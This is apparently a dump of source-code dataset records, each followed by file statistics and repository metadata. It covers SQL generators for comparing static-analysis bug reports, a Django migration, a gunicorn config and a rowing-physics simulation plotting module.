'stack_trace_table': stack_trace_table,
'tool_table': tool_table,
})
def generate_report_diff_query(tool_table: str) -> str:
return """SELECT f.image_tag
from(SELECT image_tag, count(*) as count FROM `{tool_table}` where (version = 'failed' or version = 'b') group by image_tag) f
LEFT OUTER join (SELECT image_tag, count(*) as count FROM `{tool_table}` where (version = 'passed' or version = 'f') group by image_tag) p
on f.image_tag = p.image_tag
WHERE (f.count > p.count) OR (p.count IS NULL)
;""".format(**{
'tool_table': tool_table})
def generate_report_diff_query_infer(tool_table: str) -> str:
return """SELECT f.image_tag
from(SELECT image_tag, count(*) as count FROM `{tool_table}` where (version = 'failed' or version = 'b') AND bug_type = 'NULL_DEREFERENCE' group by image_tag) f
LEFT OUTER join (SELECT image_tag, count(*) as count FROM `{tool_table}` where (version = 'passed' or version = 'f') AND bug_type = 'NULL_DEREFERENCE' group by image_tag) p
on f.image_tag = p.image_tag
WHERE (f.count > p.count) OR (p.count IS NULL)
;""".format(**{
'tool_table': tool_table})
def generate_report_diff_query_spotbugs(tool_table: str) -> str:
return """SELECT f.image_tag
from(SELECT image_tag, count(*) as count FROM `{tool_table}` where (version = 'failed' or version = 'b') AND LOCATE( 'NP_', bug_type) != '' group by image_tag) f
LEFT OUTER join (SELECT image_tag, count(*) as count FROM `{tool_table}` where (version = 'passed' or version = 'f') AND LOCATE( 'NP_', bug_type) != '' group by image_tag) p
on f.image_tag = p.image_tag
WHERE (f.count > p.count) OR (p.count IS NULL)
;""".format(**{
'tool_table': tool_table})
| 61.975124
| 270
| 0.625672
| 1,603
| 12,457
| 4.500936
| 0.040549
| 0.214553
| 0.091476
| 0.056549
| 0.978378
| 0.972003
| 0.965073
| 0.962578
| 0.954816
| 0.928067
| 0
| 0
| 0.192823
| 12,457
| 200
| 271
| 62.285
| 0.717553
| 0.008028
| 0
| 0.748503
| 1
| 0.071856
| 0.689853
| 0.414123
| 0
| 0
| 0
| 0
| 0
| 1
| 0.08982
| false
| 0.017964
| 0
| 0.08982
| 0.179641
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
13410ee1c3cfb90c86b81b3d672a15b774d8b3d8
| 1,249
|
py
|
Python
|
home/website/migrations/0038_auto_20170403_1440.py
|
HackSoftware/hackconf.bg
|
ab3cc9fcdccf8991098553e0374103e3a241ce50
|
[
"MIT"
] | 12
|
2017-03-29T11:55:20.000Z
|
2022-03-29T20:03:41.000Z
|
home/website/migrations/0038_auto_20170403_1440.py
|
HackSoftware/hackconf-wagtail
|
ab3cc9fcdccf8991098553e0374103e3a241ce50
|
[
"MIT"
] | 8
|
2020-06-05T18:16:24.000Z
|
2021-09-07T23:53:11.000Z
|
home/website/migrations/0038_auto_20170403_1440.py
|
HackSoftware/hackconf.bg
|
ab3cc9fcdccf8991098553e0374103e3a241ce50
|
[
"MIT"
] | 2
|
2018-03-31T15:06:55.000Z
|
2019-06-25T16:22:08.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.9 on 2017-04-03 14:40
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('website', '0037_auto_20170330_0911'),
]
operations = [
migrations.RemoveField(
model_name='homepage',
name='sweet_partner',
),
migrations.RemoveField(
model_name='homepage',
name='sweet_partner_title',
),
migrations.RemoveField(
model_name='homepage',
name='sweet_partner_title_bg',
),
migrations.RemoveField(
model_name='homepage',
name='sweet_partner_title_en',
),
migrations.RemoveField(
model_name='homepage',
name='transport_partner',
),
migrations.RemoveField(
model_name='homepage',
name='transport_partner_title',
),
migrations.RemoveField(
model_name='homepage',
name='transport_partner_title_bg',
),
migrations.RemoveField(
model_name='homepage',
name='transport_partner_title_en',
),
]
| 26.020833
| 47
| 0.564452
| 110
| 1,249
| 6.1
| 0.363636
| 0.250373
| 0.309985
| 0.357675
| 0.718331
| 0.718331
| 0.718331
| 0.718331
| 0.551416
| 0
| 0
| 0.038323
| 0.331465
| 1,249
| 47
| 48
| 26.574468
| 0.765269
| 0.053643
| 0
| 0.6
| 1
| 0
| 0.222222
| 0.120441
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.05
| 0
| 0.125
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
13449ab15f996379083070e1f5b6137391fc8c1b
| 93
|
py
|
Python
|
gunicorn_config.py
|
adventuringImagineer/estimator-retweet-adventure
|
3c3ea925f38cd50870c6150a804014bfd07ca190
|
[
"MIT"
] | null | null | null |
gunicorn_config.py
|
adventuringImagineer/estimator-retweet-adventure
|
3c3ea925f38cd50870c6150a804014bfd07ca190
|
[
"MIT"
] | null | null | null |
gunicorn_config.py
|
adventuringImagineer/estimator-retweet-adventure
|
3c3ea925f38cd50870c6150a804014bfd07ca190
|
[
"MIT"
] | null | null | null |
bind = "0.0.0.0:80"
# bind='0.0.0.0:5000'
workers = 2
timeout = 120
# worker_class = "gevent"
| 18.6
| 25
| 0.623656
| 19
| 93
| 3
| 0.578947
| 0.210526
| 0.210526
| 0.245614
| 0.280702
| 0
| 0
| 0
| 0
| 0
| 0
| 0.227848
| 0.150538
| 93
| 5
| 25
| 18.6
| 0.493671
| 0.462366
| 0
| 0
| 0
| 0
| 0.208333
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1355fc758e8e7aaef21e4dc12021ab876ea893fc
| 83,640
|
py
|
Python
|
rowingphysics/rowplots.py
|
sanderroosendaal/rowingphysics
|
9b809c80708e96d13761861218ff7744829cc4c9
|
[
"MIT"
] | 1
|
2017-04-24T15:20:40.000Z
|
2017-04-24T15:20:40.000Z
|
rowingphysics/rowplots.py
|
sanderroosendaal/rowingphysics
|
9b809c80708e96d13761861218ff7744829cc4c9
|
[
"MIT"
] | 2
|
2016-11-03T21:38:34.000Z
|
2016-11-29T09:50:57.000Z
|
rowingphysics/rowplots.py
|
sanderroosendaal/rowingphysics
|
9b809c80708e96d13761861218ff7744829cc4c9
|
[
"MIT"
] | null | null | null |
from __future__ import absolute_import
from __future__ import print_function
from .rowingphysics import *
from .crew import *
from .rigging import *
import pylab
import time
from . import rowingphysics
import numpy as np
from matplotlib import pyplot
from six.moves import range
def timeinterpol(v,r,rg):
tm = time.time()
res = constantvelofast(v,r,rg,timestep=0.01,aantal=15,aantal2=15,
Fmin=100,Fmax=600)
calctime = time.time()-tm
return calctime
def plot_blade():
""" Plots blade lift and drag coefficients vs angle of attack
"""
CLmax = 1.0
a = linspace(-90,90)*pi/180
C_D = 2*CLmax*np.sin(a)**2.
C_L = CLmax*np.sin(2.*a)
pyplot.clf()
ax1 = pyplot.subplot(111)
pyplot.plot(a,C_D,label='C_D')
pyplot.plot(a,C_L,label='C_L')
pylab.legend(loc='best')
pyplot.xlabel("Angle of attack (rad)")
pyplot.ylabel('Drag Coefficient')
pyplot.show()
def plotwindeffect(r,rg,aantal=10):
pyplot.clf()
r = crew()
thepower = 580.
filenames = ['1x.txt','2-.txt','4-.txt','8+.txt']
directory = "C:\\python\\rowingdata\\rigging\\"
resvelo = zeros([aantal,4])
perc = zeros([aantal,4])
wind = linspace(-6,6,aantal)
for i in range(4):
rg = read_obj(directory+filenames[i])
res = rowingphysics.constantwatt(thepower,r,rg)
v0 = res[1]
for j in range(aantal):
res = rowingphysics.constantwattfast(thepower,r,rg,windv=wind[j])
resvelo[j,i] = res[1]
perc[j,i] = 100.*(res[1]-v0)/v0
print((i,j,wind[j],perc[j,i],rg.Nrowers,rg.mb))
pyplot.plot(-wind,perc[:,i],label=filenames[i])
pyplot.legend(loc='best')
pyplot.xlabel("head wind (m/s)")
pyplot.ylabel("boat speed increase")
pyplot.show()
def temposeriesvaughan(tempomin,tempomax,F,crew,rigging,aantal=30,
timestep=0.03):
""" plot maximum, minimum and average boat speed in a range of spm
"""
tm = time.time()
tempos = linspace(tempomin,tempomax,aantal)
velocity = zeros(aantal)
vmin = zeros(aantal)
vmax = zeros(aantal)
power = zeros(aantal)
ratios=zeros(aantal)
energies=zeros(aantal)
for i in range(len(tempos)):
dv = 1
vend = 4
crew.tempo = tempos[i]
while (dv/vend > 0.001):
res = rowingphysics.energybalance(F,crew,rigging,vend,timestep,0)
dv = res[0]
vend = res[1]
res = rowingphysics.stroke(F,crew,rigging,vend,timestep,10)
velocity[i] = res[2]
ratios[i] = res[3]
energies[i] = res[4]
power[i] = res[5]
vmax[i] = res[7]
vmin[i] = res[8]
calctime = time.time()-tm
# plotjes
try:
pyplot.clf
pyplot.plot (tempos,velocity)
pyplot.plot (tempos,vmin)
pyplot.plot (tempos,vmax)
pyplot.xlabel("tempo (spm)")
pyplot.ylabel('Velocity (m/s)')
pyplot.show()
except NameError:
print("No plotting today")
return calctime
def temposeries(tempomin,tempomax,F,crew,rigging,aantal=30,timestep=0.03):
""" Various plots as a function of spm, fixed force
"""
tm = time.time()
tempos = linspace(tempomin,tempomax,aantal)
velocity = zeros(aantal)
power = zeros(aantal)
ratios=zeros(aantal)
energies=zeros(aantal)
for i in range(len(tempos)):
dv = 1
vend = 4
crew.tempo = tempos[i]
while (dv/vend > 0.001):
res = rowingphysics.energybalance(F,crew,rigging,vend,timestep,0)
dv = res[0]
vend = res[1]
res = rowingphysics.stroke(F,crew,rigging,vend,timestep,10)
velocity[i] = res[2]
ratios[i] = res[3]
energies[i] = res[4]
power[i] = res[5]
calctime = time.time()-tm
# plotjes
try:
pyplot.clf
pyplot.subplot(221)
pyplot.plot (tempos,velocity)
pyplot.xlabel("tempo (spm)")
pyplot.ylabel('Velocity (m/s)')
pyplot.subplot(222)
pyplot.plot (tempos,power)
pyplot.xlabel("tempo (spm)")
pyplot.ylabel('Power (W)')
pyplot.subplot(223)
pyplot.plot (power,velocity)
pyplot.xlabel("Power (W)")
pyplot.ylabel('Velocity (m/s)')
pyplot.subplot(224)
pyplot.plot (tempos,ratios)
pyplot.xlabel("tempo (spm)")
pyplot.ylabel('Ratio')
pyplot.show()
except NameError:
print("No plotting today")
return calctime
def catchangleseries(anglemin,anglemax,F,crew,rigging,aantal=30,timestep=0.03):
""" Plots various plots as a function of catch angle
"""
tm = time.time()
catchangles = linspace(anglemin,anglemax,aantal)
velocity = zeros(aantal)
power = zeros(aantal)
ratios=zeros(aantal)
energies=zeros(aantal)
for i in range(len(catchangles)):
dv = 1
vend = 4
rigging.catchangle = catchangles[i]
catchacceler = 5
while (dv/vend > 0.001):
res = rowingphysics.energybalance(F,crew,rigging,vend,
timestep,0,
catchacceler=catchacceler)
dv = res[0]
vend = res[1]
catchacceler = res[14]
res = rowingphysics.stroke(F,crew,rigging,vend,
timestep,10,catchacceler=catchacceler)
velocity[i] = res[2]
ratios[i] = res[3]
energies[i] = res[4]
power[i] = res[5]
calctime = time.time()-tm
# plotjes
try:
pyplot.clf
pyplot.subplot(221)
pyplot.plot (np.degrees(catchangles),velocity)
pyplot.xlabel("catch angle (o)")
pyplot.ylabel('Velocity (m/s)')
pyplot.subplot(222)
pyplot.plot (np.degrees(catchangles),power)
pyplot.xlabel("catch angle (o)")
pyplot.ylabel('Power (W)')
pyplot.subplot(223)
pyplot.plot (power,velocity)
pyplot.xlabel("Power (W)")
pyplot.ylabel('Velocity (m/s)')
pyplot.subplot(224)
pyplot.plot (np.degrees(catchangles),ratios)
pyplot.xlabel("catch angle (o)")
pyplot.ylabel('Ratio')
pyplot.show()
except NameError:
print("No plotting today")
return calctime
def longlegs(rg,doplot=1,v0=3.962):
from .crew import crew,trapezium
rr = crew(strokeprofile=trapezium(x1=0.1,h2=0.75),tempo=30.)
res = rowingphysics.energybalance(250,rr,rg,v0,dt=0.01,doplot=doplot)
return res
def shortlegs(rg,doplot=1,v0=3.997):
from .crew import crew, trapezium
rr = crew(strokeprofile=trapezium(x1=0.15,x2=0.5,h2=0.9),tempo=30.)
res = rowingphysics.energybalance(250,rr,rg,v0,dt=0.01,doplot=doplot)
return res
def plotrecstyle(crew,trecovery,aantal=50,empirical=0):
""" Plots position of handle and CM during recovery
"""
time = linspace(0,trecovery,aantal)
vh = zeros(aantal)
vcrecovery = zeros(aantal)
handlepos = zeros(aantal)+crew.strokelength
vavg = crew.strokelength/trecovery
d = crew.strokelength
for i in range(0,aantal-1):
vh[i] = crew.vhandle(vavg,trecovery,time[i])
vcrecovery[i] = crew.vcm(vh[i],handlepos[i])
handlepos[i+1] = d+d*crew.dxhandle(vavg,trecovery,time[i])
vh[aantal-1] = crew.vhandle(vavg,trecovery,time[aantal-1])
vcrecovery[aantal-1] = crew.vcm(vh[aantal-1],handlepos[aantal-1])
if (empirical!=0):
empdata = genfromtxt(empirical, delimiter = ',')
emptime = empdata[:,0]
empv = -empdata[:,1]
empdt = emptime[1]-emptime[0]
pyplot.clf
pyplot.subplot(211)
pyplot.plot(time,vh,'r-',label = 'Handle speed')
pyplot.plot(time,vcrecovery, 'b-',label = 'CM speed')
if (empirical!=0):
pyplot.plot(emptime,empv,'g-',label = 'Measured')
pylab.legend(loc='lower right')
pyplot.xlabel("time (s)")
pyplot.ylabel("velocity (m/s)")
pyplot.subplot(212)
pyplot.plot(time,handlepos,'r-',label = 'Handle Position')
pylab.legend(loc='upper right')
pyplot.xlabel("time (s)")
pyplot.ylabel("position (m)")
pyplot.show()
def plotrowerforcecurve(F,cr,aantal=50):
""" Plots the force curve
"""
x = linspace(0,cr.strokelength,aantal)
y1 = zeros(aantal)
for i in range(len(x)):
y1[i] = cr.forceprofile(F,x[i])
pyplot.clf
pyplot.plot(x,y1,'-g', label='Force Curve')
pylab.legend(loc='best')
pyplot.xlabel("Handle Position")
pyplot.ylabel('Force')
pyplot.show()
return 1
def plotforcecurve(F,cr,aantal=50):
""" Plots different force curves
"""
from .crew import flat,strongmiddle,strongend,strongbegin,trapezium
x = linspace(0,cr.strokelength,aantal)
y1 = zeros(aantal)
y2 = zeros(aantal)
y3 = zeros(aantal)
y4 = zeros(aantal)
y5 = zeros(aantal)
cr.strokeprofile = trapezium(x1=0.1,h2=0.5)
for i in range(len(x)):
y1[i] = cr.forceprofile(F,x[i])
cr.strokeprofile = trapezium(x1=0.1,h2=0.75)
for i in range(len(x)):
y2[i] = cr.forceprofile(F,x[i])
cr.strokeprofile = trapezium(x1=0.1,x2=0.5,h2=0.75)
for i in range(len(x)):
y3[i] = cr.forceprofile(F,x[i])
cr.strokeprofile = trapezium(x1=0.15,x2=0.5,h2=0.9)
for i in range(len(x)):
y4[i] = cr.forceprofile(F,x[i])
cr.strokeprofile = trapezium()
for i in range(len(x)):
y5[i] = cr.forceprofile(F,x[i])
pyplot.clf
pyplot.plot(x,y1,'-g', label='T1')
pyplot.plot(x,y2,'-r', label='T2')
pyplot.plot(x,y3,'-b', label='T3')
pyplot.plot(x,y4,'-k', label='T4')
pyplot.plot(x,y5,'-m', label='T5')
pylab.legend(loc='best')
pyplot.xlabel("Handle Position")
pyplot.ylabel('Force')
pyplot.show()
return 1
def plotforcecurveRIM(F,cr,aantal=50):
""" More force curve plots
"""
from .crew import flat,strongmiddle,strongmiddle2,strongend,strongbegin,trapezium
x = linspace(0,cr.strokelength,aantal)
y1 = zeros(aantal)
y2 = zeros(aantal)
y3 = zeros(aantal)
y4 = zeros(aantal)
y5 = zeros(aantal)
cr.strokeprofile = strongmiddle2(frac=-0.5)
for i in range(len(x)):
y1[i] = cr.forceprofile(F,x[i])
cr.strokeprofile = strongmiddle2(frac=0)
for i in range(len(x)):
y2[i] = cr.forceprofile(F,x[i])
cr.strokeprofile = strongmiddle2(frac=0.5)
for i in range(len(x)):
y3[i] = cr.forceprofile(F,x[i])
cr.strokeprofile = strongmiddle2(frac=1)
for i in range(len(x)):
y4[i] = cr.forceprofile(F,x[i])
cr.strokeprofile = trapezium()
for i in range(len(x)):
y5[i] = cr.forceprofile(F,x[i])
pyplot.clf
pyplot.plot(x,y1,'-g', label='T1')
pyplot.plot(x,y2,'-r', label='T2')
pyplot.plot(x,y3,'-b', label='T3')
pyplot.plot(x,y4,'-k', label='T4')
pyplot.plot(x,y5,'-m', label='T5')
pylab.legend(loc='best')
pyplot.xlabel("Handle Position")
pyplot.ylabel('Force')
pyplot.show()
return 1
def styleseries(tempomin,tempomax,F,crew,rigging,
aantal=30,timestep=0.03,doplot=1,timewise=0):
""" Power velocity curve for various rowing styles
"""
from .crew import flat,strongmiddle,strongend,strongbegin,trapezium
tm = time.time()
tempos = linspace(tempomin,tempomax,aantal)
velocity1 = zeros(aantal)
power1 = zeros(aantal)
ratios1=zeros(aantal)
energies1=zeros(aantal)
check1=zeros(aantal)
RIM_check1 = zeros(aantal)
RIM_E1 = zeros(aantal)
crew.strokeprofile = trapezium(x1=0.1,h2=0.5) # flat()
for i in range(len(tempos)):
dv = 1
vend = 4
crew.tempo = tempos[i]
catchacceler = 5.0
while (dv/vend > 0.001):
res = rowingphysics.energybalance(F,crew,rigging,vend,timestep,0,
timewise=timewise,
catchacceler=catchacceler)
dv = res[0]
vend = res[1]
catchacceler = res[14]
print(catchacceler)
res = rowingphysics.stroke(F,crew,rigging,vend,timestep,10,
timewise=timewise,
catchacceler=catchacceler)
velocity1[i] = res[2]
ratios1[i] = res[3]
energies1[i] = res[4]
power1[i] = res[5]
check1[i] = res[9]
RIM_check1[i] = res[11]
RIM_E1[i] = res[10]
velocity2 = zeros(aantal)
power2 = zeros(aantal)
ratios2=zeros(aantal)
energies2=zeros(aantal)
check2=zeros(aantal)
RIM_check2 = zeros(aantal)
RIM_E2 = zeros(aantal)
crew.strokeprofile = trapezium(x1=0.1,h2=0.75) # strongbegin()
for i in range(len(tempos)):
dv = 1
vend = 4
crew.tempo = tempos[i]
catchacceler = 5.0
while (dv/vend > 0.001):
res = rowingphysics.energybalance(F,crew,rigging,vend,timestep,0,
timewise=timewise,
catchacceler=catchacceler)
dv = res[0]
vend = res[1]
catchacceler = res[14]
res = rowingphysics.stroke(F,crew,rigging,vend,timestep,10,
timewise=timewise,
catchacceler=catchacceler)
velocity2[i] = res[2]
ratios2[i] = res[3]
energies2[i] = res[4]
power2[i] = res[5]
check2[i] = res[9]
RIM_check2[i] = res[11]
RIM_E2[i] = res[10]
velocity3 = zeros(aantal)
power3 = zeros(aantal)
ratios3=zeros(aantal)
energies3=zeros(aantal)
check3=zeros(aantal)
RIM_check3 = zeros(aantal)
RIM_E3 = zeros(aantal)
crew.strokeprofile = trapezium(x1=0.1,x2=0.5,h2=0.75) # strongend()
for i in range(len(tempos)):
dv = 1
vend = 4
crew.tempo = tempos[i]
catchacceler = 5.0
while (dv/vend > 0.001):
res = rowingphysics.energybalance(F,crew,rigging,vend,timestep,0,
timewise=timewise,
catchacceler=catchacceler)
dv = res[0]
vend = res[1]
catchacceler = res[14]
res = rowingphysics.stroke(F,crew,rigging,vend,timestep,10,
timewise=timewise,
catchacceler=catchacceler)
velocity3[i] = res[2]
ratios3[i] = res[3]
energies3[i] = res[4]
power3[i] = res[5]
check3[i] = res[9]
RIM_check3[i] = res[11]
RIM_E3[i] = res[10]
velocity4 = zeros(aantal)
power4 = zeros(aantal)
ratios4=zeros(aantal)
energies4=zeros(aantal)
check4=zeros(aantal)
RIM_check4=zeros(aantal)
RIM_E4=zeros(aantal)
crew.strokeprofile = trapezium(x1=0.15,x2=0.5,h2=0.9) # trapezium()
for i in range(len(tempos)):
dv = 1
vend = 4
crew.tempo = tempos[i]
catchacceler = 5.0
while (dv/vend > 0.001):
res = rowingphysics.energybalance(F,crew,rigging,vend,timestep,0,
timewise=timewise,
catchacceler=catchacceler)
dv = res[0]
vend = res[1]
catchacceler = res[14]
res = rowingphysics.stroke(F,crew,rigging,vend,timestep,10,
timewise=timewise,
catchacceler=catchacceler)
velocity4[i] = res[2]
ratios4[i] = res[3]
energies4[i] = res[4]
power4[i] = res[5]
check4[i] = res[9]
RIM_check4[i] = res[11]
RIM_E4[i] = res[10]
velocity5 = zeros(aantal)
power5 = zeros(aantal)
ratios5=zeros(aantal)
energies5=zeros(aantal)
check5=zeros(aantal)
RIM_check5 = zeros(aantal)
RIM_E5 = zeros(aantal)
crew.strokeprofile = trapezium()
for i in range(len(tempos)):
dv = 1
vend = 4
crew.tempo = tempos[i]
catchacceler = 5.0
while (dv/vend > 0.001):
res = rowingphysics.energybalance(F,crew,rigging,vend,timestep,0,
timewise=timewise,
catchacceler=catchacceler)
dv = res[0]
vend = res[1]
catchacceler = res[14]
res = rowingphysics.stroke(F,crew,rigging,vend,timestep,10,
timewise=timewise,
catchacceler=catchacceler)
velocity5[i] = res[2]
ratios5[i] = res[3]
energies5[i] = res[4]
power5[i] = res[5]
check5[i] = res[9]
RIM_check5[i] = res[11]
RIM_E5[i] = res[10]
calctime = time.time()-tm
[min1,sec1] = rowingphysics.vavgto500mtime(velocity1)
[min2,sec2] = rowingphysics.vavgto500mtime(velocity2)
[min3,sec3] = rowingphysics.vavgto500mtime(velocity3)
[min4,sec4] = rowingphysics.vavgto500mtime(velocity4)
[min5,sec5] = rowingphysics.vavgto500mtime(velocity5)
sec1 = sec1+(min1-1)*60.
sec2 = sec2+(min2-1)*60.
sec3 = sec3+(min3-1)*60.
sec4 = sec4+(min4-1)*60.
sec5 = sec5+(min5-1)*60.
# plotjes
try:
pyplot.clf
if (doplot == 1):
pyplot.plot (power1,velocity1,'go',label='T1 ')
pyplot.plot (power2,velocity2,'rs',label='T2 ')
pyplot.plot (power3,velocity3,'bv',label='T3 ')
pyplot.plot (power4,velocity4,'k^',label='T4 ')
pyplot.plot (power5,velocity5,'mo',label='T5 ')
pylab.legend(loc='best')
pyplot.xlabel("Power (W)")
pyplot.ylabel('Velocity (m/s)')
if (doplot == 2):
pyplot.plot (tempos,velocity1,'-g',label='T1')
pyplot.plot (tempos,velocity2,'-r',label='T2')
pyplot.plot (tempos,velocity3,'-b',label='T3')
pyplot.plot (tempos,velocity4,'-k',label='T4')
pyplot.plot (tempos,velocity5,'-m',label='T5')
pylab.legend(loc='best')
pyplot.xlabel("tempo (spm)")
pyplot.ylabel('Velocity (m/s)')
if (doplot == 3):
pyplot.plot (tempos,power1,'-g',label='T1')
pyplot.plot (tempos,power2,'-r',label='T2')
pyplot.plot (tempos,power3,'-b',label='T3')
pyplot.plot (tempos,power4,'-k',label='T4')
pyplot.plot (tempos,power5,'-m',label='T5')
pylab.legend(loc='best')
pyplot.xlabel("tempo (spm)")
pyplot.ylabel('Power (W)')
if (doplot == 4):
pyplot.plot (power1,sec1,'-g',label='T1')
pyplot.plot (power2,sec2,'-r',label='T2')
pyplot.plot (power4,sec3,'-b',label='T3')
pyplot.plot (power3,sec4,'-k',label='T4')
pyplot.plot (power3,sec5,'-m',label='T5')
pylab.legend(loc='best')
pyplot.xlabel("Power (W)")
pyplot.ylabel('500m time')
if (doplot == 5):
pyplot.plot (check1,velocity1,'go',label='T1 ')
pyplot.plot (check2,velocity2,'rs',label='T2 ')
pyplot.plot (check3,velocity3,'bv',label='T3 ')
pyplot.plot (check4,velocity4,'k^',label='T4 ')
pyplot.plot (check5,velocity5,'mo',label='T5 ')
pylab.legend(loc='best')
pyplot.xlabel("Check (m2/s4)")
pyplot.ylabel('Velocity (m/s)')
if (doplot == 6):
pyplot.plot (tempos,check1,'go',label='T1')
pyplot.plot (tempos,check2,'rs',label='T2')
pyplot.plot (tempos,check3,'bv',label='T3')
pyplot.plot (tempos,check4,'k^',label='T4')
pyplot.plot (tempos,check5,'mo',label='T5')
pylab.legend(loc='best')
pyplot.xlabel("tempo (spm)")
pyplot.ylabel('Crewnerd Check (m2/s4)')
if (doplot == 7):
pyplot.plot (RIM_check1,velocity1,'-go',label='T1')
pyplot.plot (RIM_check2,velocity2,'-rs',label='T2')
pyplot.plot (RIM_check3,velocity3,'-bv',label='T3')
pyplot.plot (RIM_check4,velocity4,'-k^',label='T4')
pyplot.plot (RIM_check5,velocity5,'-mo',label='T5')
pylab.legend(loc='best')
pyplot.ylabel("velocity (m/s)")
pyplot.xlabel('RIM Check (m/s)')
if (doplot == 8):
pyplot.plot (RIM_E1,velocity1,'go',label='T1')
pyplot.plot (RIM_E2,velocity2,'rs',label='T2')
pyplot.plot (RIM_E3,velocity3,'bv',label='T3')
pyplot.plot (RIM_E4,velocity4,'k^',label='T4')
pyplot.plot (RIM_E5,velocity5,'mo',label='T5')
pylab.legend(loc='best')
pyplot.ylabel("velocity (m/s)")
pyplot.xlabel('RIM Stroke Efficiency (m)')
pyplot.show()
except NameError:
print("No plotting today")
return calctime
def catchseriesRIM(anglemin,anglemax,F,crew,rigging,
aantal=30,timestep=0.03,doplot=1,timewise=0):
""" Various plots for different catch angles and style
"""
from .crew import flat,strongmiddle,strongmiddle2,strongend,strongbegin,trapezium
tm = time.time()
catchangles = linspace(anglemin,anglemax,aantal)
velocity1 = zeros(aantal)
power1 = zeros(aantal)
ratios1=zeros(aantal)
energies1=zeros(aantal)
check1=zeros(aantal)
RIM_check1 = zeros(aantal)
RIM_E1 = zeros(aantal)
crew.strokeprofile = strongmiddle2(frac=-0.5) # fitted
for i in range(len(catchangles)):
dv = 1
vend = 4
rigging.catchangle = catchangles[i]
catchacceler = 5.0
while (dv/vend > 0.001):
res = rowingphysics.energybalance(F,crew,rigging,vend,timestep,0,
timewise=timewise,
catchacceler=catchacceler)
dv = res[0]
vend = res[1]
catchacceler = res[14]
print(catchacceler)
res = rowingphysics.stroke(F,crew,rigging,vend,timestep,10,
timewise=timewise,
catchacceler=catchacceler)
velocity1[i] = res[2]
ratios1[i] = res[3]
energies1[i] = res[4]
power1[i] = res[5]
check1[i] = res[9]
RIM_check1[i] = res[11]
RIM_E1[i] = res[10]
velocity2 = zeros(aantal)
power2 = zeros(aantal)
ratios2=zeros(aantal)
energies2=zeros(aantal)
check2=zeros(aantal)
RIM_check2 = zeros(aantal)
RIM_E2 = zeros(aantal)
crew.strokeprofile = strongmiddle2(frac=0) # fitted
for i in range(len(catchangles)):
dv = 1
vend = 4
rigging.catchangle = catchangles[i]
catchacceler = 5.0
while (dv/vend > 0.001):
res = rowingphysics.energybalance(F,crew,rigging,vend,timestep,0,
timewise=timewise,
catchacceler=catchacceler)
dv = res[0]
vend = res[1]
catchacceler = res[14]
res = rowingphysics.stroke(F,crew,rigging,vend,timestep,10,
timewise=timewise,
catchacceler=catchacceler)
velocity2[i] = res[2]
ratios2[i] = res[3]
energies2[i] = res[4]
power2[i] = res[5]
check2[i] = res[9]
RIM_check2[i] = res[11]
RIM_E2[i] = res[10]
velocity3 = zeros(aantal)
power3 = zeros(aantal)
ratios3=zeros(aantal)
energies3=zeros(aantal)
check3=zeros(aantal)
RIM_check3 = zeros(aantal)
RIM_E3 = zeros(aantal)
crew.strokeprofile = strongmiddle2(frac=0.5) # fitted
for i in range(len(catchangles)):
dv = 1
vend = 4
rigging.catchangle = catchangles[i]
catchacceler = 5.0
while (dv/vend > 0.001):
res = rowingphysics.energybalance(F,crew,rigging,vend,timestep,0,
timewise=timewise,
catchacceler=catchacceler)
dv = res[0]
vend = res[1]
catchacceler = res[14]
res = rowingphysics.stroke(F,crew,rigging,vend,timestep,10,
timewise=timewise,
catchacceler=catchacceler)
velocity3[i] = res[2]
ratios3[i] = res[3]
energies3[i] = res[4]
power3[i] = res[5]
check3[i] = res[9]
RIM_check3[i] = res[11]
RIM_E3[i] = res[10]
velocity4 = zeros(aantal)
power4 = zeros(aantal)
ratios4=zeros(aantal)
energies4=zeros(aantal)
check4=zeros(aantal)
RIM_check4=zeros(aantal)
RIM_E4=zeros(aantal)
crew.strokeprofile = strongmiddle2(frac=1.0) # fitted
for i in range(len(catchangles)):
dv = 1
vend = 4
rigging.catchangle = catchangles[i]
catchacceler = 5.0
while (dv/vend > 0.001):
res = rowingphysics.energybalance(F,crew,rigging,vend,timestep,0,
timewise=timewise,
catchacceler=catchacceler)
dv = res[0]
vend = res[1]
catchacceler = res[14]
res = rowingphysics.stroke(F,crew,rigging,vend,timestep,10,
timewise=timewise,
catchacceler=catchacceler)
velocity4[i] = res[2]
ratios4[i] = res[3]
energies4[i] = res[4]
power4[i] = res[5]
check4[i] = res[9]
RIM_check4[i] = res[11]
RIM_E4[i] = res[10]
velocity5 = zeros(aantal)
power5 = zeros(aantal)
ratios5=zeros(aantal)
energies5=zeros(aantal)
check5=zeros(aantal)
RIM_check5 = zeros(aantal)
RIM_E5 = zeros(aantal)
crew.strokeprofile = trapezium()
for i in range(len(catchangles)):
dv = 1
vend = 4
rigging.catchangle = catchangles[i]
catchacceler = 5.0
while (dv/vend > 0.001):
res = rowingphysics.energybalance(F,crew,rigging,vend,timestep,0,
timewise=timewise,
catchacceler=catchacceler)
dv = res[0]
vend = res[1]
catchacceler = res[14]
res = rowingphysics.stroke(F,crew,rigging,vend,timestep,10,
timewise=timewise,
catchacceler=catchacceler)
velocity5[i] = res[2]
ratios5[i] = res[3]
energies5[i] = res[4]
power5[i] = res[5]
check5[i] = res[9]
RIM_check5[i] = res[11]
